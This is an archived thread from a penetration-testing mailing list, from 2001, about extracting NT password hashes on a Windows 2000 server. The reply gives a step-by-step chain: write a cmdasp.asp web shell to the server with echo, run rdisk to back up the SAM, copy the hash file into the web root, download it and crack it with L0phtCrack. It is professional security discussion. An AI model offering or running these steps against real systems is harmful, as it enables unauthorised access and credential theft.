Home page logo
/

pen-test logo Penetration Testing mailing list archives

RE: Extracting NT password hashes from registry export file
From: pmawson () deloitte co nz
Date: Thu, 1 Nov 2001 10:23:54 +1300

David

One problem you have is even administrator doesn't have access to the sam
and security hives in the registry.
Only the system account has access to these.
As a result it is unlikely that the registry export contains these hives.
There may be passwords cached in other areas, I don't know, someone else may
be able to answer that one.

If you can run regedit /e then you should be able to run
echo "I am the first line of cmdasp.asp" >>cmdasp.asp

Use this technique to get cmdasp.asp up to the server.

You can then use cmdasp.asp to run rdisk /s- (back up the registry to the
repair directory)
Run copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam._
Use your browser to download the file  http://www.taget.com/sam._
Run it through lophtcrack and you're done.


Phill


-----Original Message-----
From: David Watson [mailto:david.watson () ioko365 com]
Sent: Thursday, 1 November 2001 4:59 a.m.
To: pen-test () securityfocus com
Subject: Extracting NT password hashes from registry export file


Hi,

Hopefully someone will have come across this problem before and will be 
able to offer some advice to save me some unnecessary pain. I`m trying to 
find a method to quickly and easily extract the NT password hashes from a 
registry export text file (ie regedit /e reg.txt) of a Win2K server.

I have no file upload capability to the server in question, so I cannot use 
interactive methods such as pwdump/samdump to export the NT password hashes 
from memory (or pwdump3 with DLL injection for syskey protected hashes). 
However, I have been able to export a copy of registry as local 
administrator and download this data locally. Short of opening the ASCII 
export in a hex editor, locating the correct password hash starting off-set 
location in [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4] and 
manually extracting the first 16 bytes for the LMHash and the next 16 bytes 
for the NTHash from the "V"=hex: record for each account (which will be 
skeyed on further obfuscated via DES encryption with the user's RID as the 
key I believe), I can`t find any tool or current technique to do this more 
easily.

Has anyone ever tried to do this before, or come across/written a tool 
capable of reading an entire export file and extracting all the necessary 
data? Is there a better way to approach this problem that I might have 
missed? The source code for pwdump has a method to handle the 
de-obfuscation of the hashes but i`m surprised that I cannot find any 
previous papers or tools that attempt this process.

As an aside, in the past on NT4 I would have updated the Windows repair 
directory using rdisk and extracted the hashes from the SAM. This only 
appears to be possible now in Win2K and above when using the GUI as command 
line rdisk support was apparently dropped recently (MS Q231777). Has anyone 
found a method of up refreshing the repair directory from the command line 
in Win2K yet?

Any advice appreciated, i`m happy to summarise my findings and post them 
here for others.

Thanks,

David



--
David Watson                    Voice:  +44 1904 438000
Technical Manager               Fax:    +44 1904 435450
ioko365                 Email:  david.watson () ioko365 com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

************************************************************
CAUTION:  This e-mail and any attachment(s) contains
information that is both confidential and possibly legally
privileged.  No reader may make any use of its content
unless that use is approved by Deloitte separately in writing.
Any opinion, advice or information contained in this e-mail
and any attachment(s) is to be treated as interim and
provisional only and for the strictly limited purpose of the
recipient as communicated to us.  Neither the recipient nor
any other person should act upon it without our separate
written authorisation of reliance.
If you have received this message in error please notify us
immediately and destroy this message.  Thank you.
Deloitte Touche Tohmatsu
Internet: www.deloitte.co.nz
************************************************************ 

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault